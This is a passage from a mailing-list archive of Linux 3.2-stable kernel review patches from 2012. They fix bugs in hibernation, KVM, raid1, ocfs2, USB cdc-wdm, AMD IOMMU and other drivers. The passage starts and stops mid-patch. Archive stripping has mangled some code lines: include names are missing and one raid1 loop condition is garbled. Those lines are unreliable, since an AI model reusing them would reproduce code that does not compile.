 1 file changed, 39 insertions(+), 23 deletions(-)

diff --git a/kernel/power/swap.c b/kernel/power/swap.c
index eef311a..11e22c0 100644
--- a/kernel/power/swap.c
+++ b/kernel/power/swap.c
@@ -6,7 +6,7 @@
  *
  * Copyright (C) 1998,2001-2005 Pavel Machek 
  * Copyright (C) 2006 Rafael J. Wysocki 
- * Copyright (C) 2010 Bojan Smojver 
+ * Copyright (C) 2010-2012 Bojan Smojver 
  *
  * This file is released under the GPLv2.
  *
@@ -282,14 +282,17 @@ static int write_page(void *buf, sector_t offset, struct 
bio **bio_chain)
return -ENOSPC;
 
if (bio_chain) {
-   src = (void *)__get_free_page(__GFP_WAIT | __GFP_HIGH);
+   src = (void *)__get_free_page(__GFP_WAIT | __GFP_NOWARN |
+ __GFP_NORETRY);
if (src) {
copy_page(src, buf);
} else {
ret = hib_wait_on_bio_chain(bio_chain); /* Free pages */
if (ret)
return ret;
-   src = (void *)__get_free_page(__GFP_WAIT | __GFP_HIGH);
+   src = (void *)__get_free_page(__GFP_WAIT |
+ __GFP_NOWARN |
+ __GFP_NORETRY);
if (src) {
copy_page(src, buf);
} else {
@@ -367,12 +370,17 @@ static int swap_write_page(struct swap_map_handle 
*handle, void *buf,
clear_page(handle->cur);
handle->cur_swap = offset;
handle->k = 0;
-   }
-   if (bio_chain && low_free_pages() <= handle->reqd_free_pages) {
-   error = hib_wait_on_bio_chain(bio_chain);
-   if (error)
-   goto out;
-   handle->reqd_free_pages = reqd_free_pages();
+
+   if (bio_chain && low_free_pages() <= handle->reqd_free_pages) {
+   error = hib_wait_on_bio_chain(bio_chain);
+   if (error)
+   goto out;
+   /*
+* Recalculate the number of required free pages, to
+* make sure we never take more than half.
+*/
+   handle->reqd_free_pages = reqd_free_pages();
+   }
}
  out:
return error;
@@ -419,8 +427,9 @@ static int swap_writer_finish(struct swap_map_handle 
*handle,
 /* Maximum number of threads for compression/decompression. */
 #define LZO_THREADS3
 
-/* Maximum number of pages for read buffering. */
-#define LZO_READ_PAGES (MAP_PAGE_ENTRIES * 8)
+/* Minimum/maximum number of pages for read buffering. */
+#define LZO_MIN_RD_PAGES   1024
+#define LZO_MAX_RD_PAGES   8192
 
 
 /**
@@ -631,12 +640,6 @@ static int save_image_lzo(struct swap_map_handle *handle,
}
 
/*
-* Adjust number of free pages after all allocations have been done.
-* We don't want to run out of pages when writing.
-*/
-   handle->reqd_free_pages = reqd_free_pages();
-
-   /*
 * Start the CRC32 thread.
 */
init_waitqueue_head(&crc->go);
@@ -657,6 +660,12 @@ static int save_image_lzo(struct swap_map_handle *handle,
goto out_clean;
}
 
+   /*
+* Adjust the number of required free pages after all allocations have
+* been done. We don't want to run out of pages when writing.
+*/
+   handle->reqd_free_pages = reqd_free_pages();
+
printk(KERN_INFO
"PM: Using %u thread(s) for compression.\n"
"PM: Compressing and saving image data (%u pages) ... ",
@@ -10

[ 048/108] NFC: Export nfc.h to userland

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Samuel Ortiz 

commit dbd4fcaf8d664fab4163b1f8682e41ad8bff3444 upstream.

The netlink commands and attributes, along with the socket structure
definitions need to be exported.

Signed-off-by: Samuel Ortiz 
Signed-off-by: John W. Linville 
Signed-off-by: Ben Hutchings 
---
 include/linux/Kbuild |1 +
 1 file changed, 1 insertion(+)

diff --git a/include/linux/Kbuild b/include/linux/Kbuild
index 3c9b616..f08e3ae 100644
--- a/include/linux/Kbuild
+++ b/include/linux/Kbuild
@@ -271,6 +271,7 @@ header-y += netfilter_ipv4.h
 header-y += netfilter_ipv6.h
 header-y += netlink.h
 header-y += netrom.h
+header-y += nfc.h
 header-y += nfs.h
 header-y += nfs2.h
 header-y += nfs3.h


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 050/108] cfg80211: check iface combinations only when iface is running

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Michal Kazior 

commit f8cdddb8d61d16a156229f0910f7ecfc7a82c003 upstream.

Don't validate interface combinations on a stopped
interface. Otherwise we might end up being able to
create a new interface with a certain type, but
won't be able to change an existing interface
into that type.

This also skips some other functions when
interface is stopped and changing interface type.

Signed-off-by: Michal Kazior 
Signed-off-by: Johannes Berg 
Signed-off-by: Ben Hutchings 
---
 net/wireless/util.c |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/wireless/util.c b/net/wireless/util.c
index 8f2d68f..316cfd0 100644
--- a/net/wireless/util.c
+++ b/net/wireless/util.c
@@ -804,7 +804,7 @@ int cfg80211_change_iface(struct cfg80211_registered_device 
*rdev,
 ntype == NL80211_IFTYPE_P2P_CLIENT))
return -EBUSY;
 
-   if (ntype != otype) {
+   if (ntype != otype && netif_running(dev)) {
err = cfg80211_can_change_interface(rdev, dev->ieee80211_ptr,
ntype);
if (err)


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 047/108] Remove easily user-triggerable BUG from generic_setlease

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Dave Jones 

commit 8d657eb3b43861064d36241e88d9d61c709f33f0 upstream.

This can be trivially triggered from userspace by passing in something 
unexpected.

kernel BUG at fs/locks.c:1468!
invalid opcode:  [#1] SMP
RIP: 0010:generic_setlease+0xc2/0x100
Call Trace:
  __vfs_setlease+0x35/0x40
  fcntl_setlease+0x76/0x150
  sys_fcntl+0x1c6/0x810
  system_call_fastpath+0x1a/0x1f

Signed-off-by: Dave Jones 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 fs/locks.c |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/fs/locks.c b/fs/locks.c
index 814c51d..fce6238 100644
--- a/fs/locks.c
+++ b/fs/locks.c
@@ -1465,7 +1465,7 @@ int generic_setlease(struct file *filp, long arg, struct 
file_lock **flp)
case F_WRLCK:
return generic_add_lease(filp, arg, flp);
default:
-   BUG();
+   return -EINVAL;
}
 }
 EXPORT_SYMBOL(generic_setlease);


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 046/108] block: fix infinite loop in __getblk_slow

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jeff Moyer 

commit 91f68c89d8f35fe98ea04159b9a3b42d0149478f upstream.

Commit 080399aaaf35 ("block: don't mark buffers beyond end of disk as
mapped") exposed a bug in __getblk_slow that causes mount to hang as it
loops infinitely waiting for a buffer that lies beyond the end of the
disk to become uptodate.

The problem was initially reported by Torsten Hilbrich here:

https://lkml.org/lkml/2012/6/18/54

and also reported independently here:

http://www.sysresccd.org/forums/viewtopic.php?f=13&t=4511

and then Richard W.M.  Jones and Marcos Mello noted a few separate
bugzillas also associated with the same issue.  This patch has been
confirmed to fix:

https://bugzilla.redhat.com/show_bug.cgi?id=835019

The main problem is here, in __getblk_slow:

for (;;) {
struct buffer_head * bh;
int ret;

bh = __find_get_block(bdev, block, size);
if (bh)
return bh;

ret = grow_buffers(bdev, block, size);
if (ret < 0)
return NULL;
if (ret == 0)
free_more_memory();
}

__find_get_block does not find the block, since it will not be marked as
mapped, and so grow_buffers is called to fill in the buffers for the
associated page.  I believe the for (;;) loop is there primarily to
retry in the case of memory pressure keeping grow_buffers from
succeeding.  However, we also continue to loop for other cases, like the
block lying beond the end of the disk.  So, the fix I came up with is to
only loop when grow_buffers fails due to memory allocation issues
(return value of 0).

The attached patch was tested by myself, Torsten, and Rich, and was
found to resolve the problem in call cases.

Signed-off-by: Jeff Moyer 
Reported-and-Tested-by: Torsten Hilbrich 
Tested-by: Richard W.M. Jones 
Reviewed-by: Josh Boyer 
[ Jens is on vacation, taking this directly  - Linus ]
--
Stable Notes: this patch requires backport to 3.0, 3.2 and 3.3.
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 fs/buffer.c |   22 +-
 1 file changed, 13 insertions(+), 9 deletions(-)

diff --git a/fs/buffer.c b/fs/buffer.c
index 838a9cf..c7062c8 100644
--- a/fs/buffer.c
+++ b/fs/buffer.c
@@ -1036,6 +1036,9 @@ grow_buffers(struct block_device *bdev, sector_t block, 
int size)
 static struct buffer_head *
 __getblk_slow(struct block_device *bdev, sector_t block, int size)
 {
+   int ret;
+   struct buffer_head *bh;
+
/* Size must be multiple of hard sectorsize */
if (unlikely(size & (bdev_logical_block_size(bdev)-1) ||
(size < 512 || size > PAGE_SIZE))) {
@@ -1048,20 +1051,21 @@ __getblk_slow(struct block_device *bdev, sector_t 
block, int size)
return NULL;
}
 
-   for (;;) {
-   struct buffer_head * bh;
-   int ret;
+retry:
+   bh = __find_get_block(bdev, block, size);
+   if (bh)
+   return bh;
 
+   ret = grow_buffers(bdev, block, size);
+   if (ret == 0) {
+   free_more_memory();
+   goto retry;
+   } else if (ret > 0) {
bh = __find_get_block(bdev, block, size);
if (bh)
return bh;
-
-   ret = grow_buffers(bdev, block, size);
-   if (ret < 0)
-   return NULL;
-   if (ret == 0)
-   free_more_memory();
}
+   return NULL;
 }
 
 /*


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 044/108] hwmon: (it87) Preserve configuration register bits on init

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Jean Delvare 

commit 41002f8dd5938d5ad1d008ce5bfdbfe47fa7b4e8 upstream.

We were accidentally losing one bit in the configuration register on
device initialization. It was reported to freeze one specific system
right away. Properly preserve all bits we don't explicitly want to
change in order to prevent that.

Reported-by: Stevie Trujillo 
Signed-off-by: Jean Delvare 
Reviewed-by: Guenter Roeck 
Signed-off-by: Ben Hutchings 
---
 drivers/hwmon/it87.c |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/hwmon/it87.c b/drivers/hwmon/it87.c
index e7701d9..f1de397 100644
--- a/drivers/hwmon/it87.c
+++ b/drivers/hwmon/it87.c
@@ -2341,7 +2341,7 @@ static void __devinit it87_init_device(struct 
platform_device *pdev)
 
/* Start monitoring */
it87_write_value(data, IT87_REG_CONFIG,
-(it87_read_value(data, IT87_REG_CONFIG) & 0x36)
+(it87_read_value(data, IT87_REG_CONFIG) & 0x3e)
 | (update_vbat ? 0x41 : 0x01));
 }
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 045/108] ARM: SAMSUNG: fix race in s3c_adc_start for ADC

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Todd Poynor 

commit 8265981bb439f3ecc5356fb877a6c2a6636ac88a upstream.

Checking for adc->ts_pend already claimed should be done with the
lock held.

Signed-off-by: Todd Poynor 
Acked-by: Ben Dooks 
Signed-off-by: Kukjin Kim 
Signed-off-by: Ben Hutchings 
---
 arch/arm/plat-samsung/adc.c |8 +---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/arch/arm/plat-samsung/adc.c b/arch/arm/plat-samsung/adc.c
index 33ecd0c..b1e05cc 100644
--- a/arch/arm/plat-samsung/adc.c
+++ b/arch/arm/plat-samsung/adc.c
@@ -157,11 +157,13 @@ int s3c_adc_start(struct s3c_adc_client *client,
return -EINVAL;
}
 
-   if (client->is_ts && adc->ts_pend)
-   return -EAGAIN;
-
spin_lock_irqsave(&adc->lock, flags);
 
+   if (client->is_ts && adc->ts_pend) {
+   spin_unlock_irqrestore(&adc->lock, flags);
+   return -EAGAIN;
+   }
+
client->channel = channel;
client->nr_samples = nr_samples;
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 039/108] ocfs2: fix NULL pointer dereference in __ocfs2_change_file_space()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Luis Henriques 

commit a4e08d001f2e50bb8b3c4eebadcf08e5535f02ee upstream.

As ocfs2_fallocate() will invoke __ocfs2_change_file_space() with a NULL
as the first parameter (file), it may trigger a NULL pointer dereferrence
due to a missing check.

Addresses http://bugs.launchpad.net/bugs/1006012

Signed-off-by: Luis Henriques 
Reported-by: Bret Towe 
Tested-by: Bret Towe 
Cc: Sunil Mushran 
Acked-by: Joel Becker 
Acked-by: Mark Fasheh 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 fs/ocfs2/file.c |2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c
index 98513c8..7602783 100644
--- a/fs/ocfs2/file.c
+++ b/fs/ocfs2/file.c
@@ -1950,7 +1950,7 @@ static int __ocfs2_change_file_space(struct file *file, 
struct inode *inode,
if (ret < 0)
mlog_errno(ret);
 
-   if (file->f_flags & O_SYNC)
+   if (file && (file->f_flags & O_SYNC))
handle->h_sync = 1;
 
ocfs2_commit_trans(osb, handle);


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 041/108] drivers/rtc/rtc-mxc.c: fix irq enabled interrupts warning

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Benoît Thébaudeau 

commit b59f6d1febd6cbe9fae4589bf72da0ed32bc69e0 upstream.

Fixes

  WARNING: at irq/handle.c:146 handle_irq_event_percpu+0x19c/0x1b8()
  irq 25 handler mxc_rtc_interrupt+0x0/0xac enabled interrupts
  Modules linked in:
   (unwind_backtrace+0x0/0xf0) from (warn_slowpath_common+0x4c/0x64)
   (warn_slowpath_common+0x4c/0x64) from (warn_slowpath_fmt+0x30/0x40)
   (warn_slowpath_fmt+0x30/0x40) from (handle_irq_event_percpu+0x19c/0x1b8)
   (handle_irq_event_percpu+0x19c/0x1b8) from (handle_irq_event+0x28/0x38)
   (handle_irq_event+0x28/0x38) from (handle_level_irq+0x80/0xc4)
   (handle_level_irq+0x80/0xc4) from (generic_handle_irq+0x24/0x38)
   (generic_handle_irq+0x24/0x38) from (handle_IRQ+0x30/0x84)
   (handle_IRQ+0x30/0x84) from (avic_handle_irq+0x2c/0x4c)
   (avic_handle_irq+0x2c/0x4c) from (__irq_svc+0x40/0x60)
  Exception stack(0xc050bf60 to 0xc050bfa8)
  bf60: 0001  003c4208 c0018e20 c050a000 c050a000 c054a4c8 c050a000
  bf80: c05157a8 4117b363 80503bb4  0100 c050bfa8 c0018e2c c000e808
  bfa0: 6013 
   (__irq_svc+0x40/0x60) from (default_idle+0x1c/0x30)
   (default_idle+0x1c/0x30) from (cpu_idle+0x68/0xa8)
   (cpu_idle+0x68/0xa8) from (start_kernel+0x22c/0x26c)

Signed-off-by: Benoît Thébaudeau 
Cc: Alessandro Zummo 
Cc: Sascha Hauer 
Acked-by: Uwe Kleine-König 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 drivers/rtc/rtc-mxc.c |5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

--- a/drivers/rtc/rtc-mxc.c
+++ b/drivers/rtc/rtc-mxc.c
@@ -191,10 +191,11 @@ static irqreturn_t mxc_rtc_interrupt(int
struct platform_device *pdev = dev_id;
struct rtc_plat_data *pdata = platform_get_drvdata(pdev);
void __iomem *ioaddr = pdata->ioaddr;
+   unsigned long flags;
u32 status;
u32 events = 0;
 
-   spin_lock_irq(&pdata->rtc->irq_lock);
+   spin_lock_irqsave(&pdata->rtc->irq_lock, flags);
status = readw(ioaddr + RTC_RTCISR) & readw(ioaddr + RTC_RTCIENR);
/* clear interrupt sources */
writew(status, ioaddr + RTC_RTCISR);
@@ -217,7 +218,7 @@ static irqreturn_t mxc_rtc_interrupt(int
rtc_update_alarm(&pdev->dev, &pdata->g_rtc_alarm);
 
rtc_update_irq(pdata->rtc, 1, events);
-   spin_unlock_irq(&pdata->rtc->irq_lock);
+   spin_unlock_irqrestore(&pdata->rtc->irq_lock, flags);
 
return IRQ_HANDLED;
 }


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 036/108] md/raid1: fix use-after-free bug in RAID1 data-check code.

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: NeilBrown 

commit 2d4f4f3384d4ef4f7c571448e803a1ce721113d5 upstream.

This bug has been present ever since data-check was introduce
in 2.6.16.  However it would only fire if a data-check were
done on a degraded array, which was only possible if the array
has 3 or more devices.  This is certainly possible, but is quite
uncommon.

Since hot-replace was added in 3.3 it can happen more often as
the same condition can arise if not all possible replacements are
present.

The problem is that as soon as we submit the last read request, the
'r1_bio' structure could be freed at any time, so we really should
stop looking at it.  If the last device is being read from we will
stop looking at it.  However if the last device is not due to be read
from, we will still check the bio pointer in the r1_bio, but the
r1_bio might already be free.

So use the read_targets counter to make sure we stop looking for bios
to submit as soon as we have submitted them all.

This fix is suitable for any -stable kernel since 2.6.16.

Reported-by: Arnold Schulz 
Signed-off-by: NeilBrown 
[bwh: Backported to 3.2: no doubling of conf->raid_disks; we don't have
 hot-replace support]
Signed-off-by: Ben Hutchings 
---
 drivers/md/raid1.c |3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

--- a/drivers/md/raid1.c
+++ b/drivers/md/raid1.c
@@ -2378,9 +2378,10 @@ static sector_t sync_request(struct mdde
 */
if (test_bit(MD_RECOVERY_REQUESTED, &mddev->recovery)) {
atomic_set(&r1_bio->remaining, read_targets);
-   for (i=0; iraid_disks; i++) {
+   for (i = 0; i < conf->raid_disks && read_targets; i++) {
bio = r1_bio->bios[i];
if (bio->bi_end_io == end_sync_read) {
+   read_targets--;
md_sync_acct(bio->bi_bdev, nr_sectors);
generic_make_request(bio);
}


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 032/108] mtd: nandsim: dont open code a do_div helper

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Herton Ronaldo Krzesinski 

commit 596fd46268634082314b3af1ded4612e1b7f3f03 upstream.

We don't need to open code the divide function, just use div_u64 that
already exists and do the same job. While this is a straightforward
clean up, there is more to that, the real motivation for this.

While building on a cross compiling environment in armel, using gcc
4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5), I was getting the following build
error:

ERROR: "__aeabi_uldivmod" [drivers/mtd/nand/nandsim.ko] undefined!

After investigating with objdump and hand built assembly version
generated with the compiler, I narrowed __aeabi_uldivmod as being
generated from the divide function. When nandsim.c is built with
-fno-inline-functions-called-once, that happens when
CONFIG_DEBUG_SECTION_MISMATCH is enabled, the do_div optimization in
arch/arm/include/asm/div64.h doesn't work as expected with the open
coded divide function: even if the do_div we are using doesn't have a
constant divisor, the compiler still includes the else parts of the
optimized do_div macro, and translates the divisions there to use
__aeabi_uldivmod, instead of only calling __do_div_asm -> __do_div64 and
optimizing/removing everything else out.

So to reproduce, gcc 4.6 plus CONFIG_DEBUG_SECTION_MISMATCH=y and
CONFIG_MTD_NAND_NANDSIM=m should do it, building on armel.

After this change, the compiler does the intended thing even with
-fno-inline-functions-called-once, and optimizes out as expected the
constant handling in the optimized do_div on arm. As this also avoids a
build issue, I'm marking for Stable, as I think is applicable for this
case.

Signed-off-by: Herton Ronaldo Krzesinski 
Acked-by: Nicolas Pitre 
Signed-off-by: Artem Bityutskiy 
Signed-off-by: David Woodhouse 
Signed-off-by: Ben Hutchings 
---
 drivers/mtd/nand/nandsim.c |   12 +++-
 1 file changed, 3 insertions(+), 9 deletions(-)

diff --git a/drivers/mtd/nand/nandsim.c b/drivers/mtd/nand/nandsim.c
index 6cc8fbf..cf0cd31 100644
--- a/drivers/mtd/nand/nandsim.c
+++ b/drivers/mtd/nand/nandsim.c
@@ -28,7 +28,7 @@
 #include 
 #include 
 #include 
-#include 
+#include 
 #include 
 #include 
 #include 
@@ -546,12 +546,6 @@ static char *get_partition_name(int i)
return kstrdup(buf, GFP_KERNEL);
 }
 
-static uint64_t divide(uint64_t n, uint32_t d)
-{
-   do_div(n, d);
-   return n;
-}
-
 /*
  * Initialize the nandsim structure.
  *
@@ -580,7 +574,7 @@ static int init_nandsim(struct mtd_info *mtd)
ns->geom.oobsz= mtd->oobsize;
ns->geom.secsz= mtd->erasesize;
ns->geom.pgszoob  = ns->geom.pgsz + ns->geom.oobsz;
-   ns->geom.pgnum= divide(ns->geom.totsz, ns->geom.pgsz);
+   ns->geom.pgnum= div_u64(ns->geom.totsz, ns->geom.pgsz);
ns->geom.totszoob = ns->geom.totsz + (uint64_t)ns->geom.pgnum * 
ns->geom.oobsz;
ns->geom.secshift = ffs(ns->geom.secsz) - 1;
ns->geom.pgshift  = chip->page_shift;
@@ -921,7 +915,7 @@ static int setup_wear_reporting(struct mtd_info *mtd)
 
if (!rptwear)
return 0;
-   wear_eb_count = divide(mtd->size, mtd->erasesize);
+   wear_eb_count = div_u64(mtd->size, mtd->erasesize);
mem = wear_eb_count * sizeof(unsigned long);
if (mem / sizeof(unsigned long) != wear_eb_count) {
NS_ERR("Too many erase blocks for wear reporting\n");


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 021/108] KVM: Fix buffer overflow in kvm_set_irq()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Avi Kivity 

commit f2ebd422f71cda9c791f76f85d2ca102ae34a1ed upstream.

kvm_set_irq() has an internal buffer of three irq routing entries, allowing
connecting a GSI to three IRQ chips or on MSI.  However setup_routing_entry()
does not properly enforce this, allowing three irqchip routes followed by
an MSI route to overflow the buffer.

Fix by ensuring that an MSI entry is added to an empty list.

Signed-off-by: Avi Kivity 
Signed-off-by: Ben Hutchings 
---
 virt/kvm/irq_comm.c |1 +
 1 file changed, 1 insertion(+)

diff --git a/virt/kvm/irq_comm.c b/virt/kvm/irq_comm.c
index a6a0365..5afb431 100644
--- a/virt/kvm/irq_comm.c
+++ b/virt/kvm/irq_comm.c
@@ -332,6 +332,7 @@ static int setup_routing_entry(struct kvm_irq_routing_table 
*rt,
 */
hlist_for_each_entry(ei, n, &rt->map[ue->gsi], link)
if (ei->type == KVM_IRQ_ROUTING_MSI ||
+   ue->type == KVM_IRQ_ROUTING_MSI ||
ue->u.irqchip.irqchip == ei->irqchip.irqchip)
return r;
 


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 031/108] USB: cdc-wdm: fix lockup on error in wdm_read

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Bjørn Mork  

commit b086b6b10d9f182cd8d2f0dcfd7fd11edba93fc9 upstream.

Clear the WDM_READ flag on empty reads to avoid running
forever in an infinite tight loop, causing lockups:

Jul  1 21:58:11 nemi kernel: [ 3658.898647] qmi_wwan 2-1:1.2: Unexpected error 
-71
Jul  1 21:58:36 nemi kernel: [ 3684.072021] BUG: soft lockup - CPU#0 stuck for 
23s! [qmi.pl:12235]
Jul  1 21:58:36 nemi kernel: [ 3684.072212] CPU 0
Jul  1 21:58:36 nemi kernel: [ 3684.072355]
Jul  1 21:58:36 nemi kernel: [ 3684.072367] Pid: 12235, comm: qmi.pl Tainted: P 
  O 3.5.0-rc2+ #13 LENOVO 2776LEG/2776LEG
Jul  1 21:58:36 nemi kernel: [ 3684.072383] RIP: 0010:[]  
[] spin_unlock_irq+0x8/0xc [cdc_wdm]
Jul  1 21:58:36 nemi kernel: [ 3684.072388] RSP: 0018:88022dca1e70  EFLAGS: 
0282
Jul  1 21:58:36 nemi kernel: [ 3684.072393] RAX: 88022fc3f650 RBX: 
811c56f7 RCX: 0001000ce8c1
Jul  1 21:58:36 nemi kernel: [ 3684.072398] RDX: 0010 RSI: 
0267d810 RDI: 88022fc3f650
Jul  1 21:58:36 nemi kernel: [ 3684.072403] RBP: 88022dca1eb0 R08: 
a063578e R09: 
Jul  1 21:58:36 nemi kernel: [ 3684.072407] R10: 0008 R11: 
0246 R12: 0002
Jul  1 21:58:36 nemi kernel: [ 3684.072412] R13: 0246 R14: 
0002 R15: 8802281d8c88
Jul  1 21:58:36 nemi kernel: [ 3684.072418] FS:  7f666a260700() 
GS:88023bc0() knlGS:
Jul  1 21:58:36 nemi kernel: [ 3684.072423] CS:  0010 DS:  ES:  CR0: 
80050033
Jul  1 21:58:36 nemi kernel: [ 3684.072428] CR2: 0270d9d8 CR3: 
00022e865000 CR4: 07f0
Jul  1 21:58:36 nemi kernel: [ 3684.072433] DR0:  DR1: 
 DR2: 
Jul  1 21:58:36 nemi kernel: [ 3684.072438] DR3:  DR6: 
0ff0 DR7: 0400
Jul  1 21:58:36 nemi kernel: [ 3684.072444] Process qmi.pl (pid: 12235, 
threadinfo 88022dca, task 88022ff76380)
Jul  1 21:58:36 nemi kernel: [ 3684.072448] Stack:
Jul  1 21:58:36 nemi kernel: [ 3684.072458]  a063592e 00010002 
88022fc3f650 88022fc3f6a8
Jul  1 21:58:36 nemi kernel: [ 3684.072466]  0200 0001 
0267d810 
Jul  1 21:58:36 nemi kernel: [ 3684.072475]   880212cfb6d0 
0200 880212cfb6c0
Jul  1 21:58:36 nemi kernel: [ 3684.072479] Call Trace:
Jul  1 21:58:36 nemi kernel: [ 3684.072489]  [] ? 
wdm_read+0x1a0/0x263 [cdc_wdm]
Jul  1 21:58:36 nemi kernel: [ 3684.072500]  [] ? 
vfs_read+0xa1/0xfb
Jul  1 21:58:36 nemi kernel: [ 3684.072509]  [] ? 
alarm_setitimer+0x35/0x64
Jul  1 21:58:36 nemi kernel: [ 3684.072517]  [] ? 
sys_read+0x45/0x6e
Jul  1 21:58:36 nemi kernel: [ 3684.072525]  [] ? 
system_call_fastpath+0x16/0x1b
Jul  1 21:58:36 nemi kernel: [ 3684.072557] Code: <66> 66 90 c3 83 ff ed 89 f8 
74 16 7f 06 83 ff a1 75 0a c3 83 ff f4

The WDM_READ flag is normally cleared by wdm_int_callback
before resubmitting the read urb, and set by wdm_in_callback
when this urb returns with data or an error.  But a crashing
device may cause both a read error and cancelling all urbs.
Make sure that the flag is cleared by wdm_read if the buffer
is empty.

We don't clear the flag on errors, as there may be pending
data in the buffer which should be processed.  The flag will
instead be cleared on the next wdm_read call.

Signed-off-by: Bjørn Mork 
Acked-by: Oliver Neukum 
Signed-off-by: Greg Kroah-Hartman 
Signed-off-by: Ben Hutchings 
---
 drivers/usb/class/cdc-wdm.c |2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/usb/class/cdc-wdm.c b/drivers/usb/class/cdc-wdm.c
index 8fd398d..ee46927 100644
--- a/drivers/usb/class/cdc-wdm.c
+++ b/drivers/usb/class/cdc-wdm.c
@@ -500,6 +500,8 @@ retry:
goto retry;
}
if (!desc->reslength) { /* zero length read */
+   dev_dbg(&desc->intf->dev, "%s: zero length - clearing 
WDM_READ\n", __func__);
+   clear_bit(WDM_READ, &desc->flags);
spin_unlock_irq(&desc->iuspin);
goto retry;
}


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 024/108] iommu/amd: Fix missing iommu_shutdown initialization in passthrough mode

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Shuah Khan 

commit f2f12b6fc032c7b1419fd6db84e2868b5f05a878 upstream.

The iommu_shutdown callback is not initialized when the AMD
IOMMU driver runs in passthrough mode. Fix that by moving
the callback initialization before the check for
passthrough mode.

Signed-off-by: Shuah Khan 
Signed-off-by: Joerg Roedel 
[bwh: Backported to 3.2: adjust context]
Signed-off-by: Ben Hutchings 
---
diff --git a/drivers/iommu/amd_iommu_init.c b/drivers/iommu/amd_iommu_init.c
index 542024b..c04ddca 100644
--- a/drivers/iommu/amd_iommu_init.c
+++ b/drivers/iommu/amd_iommu_init.c
@@ -1641,6 +1641,8 @@ static int __init amd_iommu_init(void)
 
register_syscore_ops(&amd_iommu_syscore_ops);
 
+   x86_platform.iommu_shutdown = disable_iommus;
+
if (iommu_pass_through)
goto out;
 
@@ -1649,7 +1651,6 @@ static int __init amd_iommu_init(void)
else
printk(KERN_INFO "AMD-Vi: Lazy IO/TLB flushing enabled\n");
 
-   x86_platform.iommu_shutdown = disable_iommus;
 out:
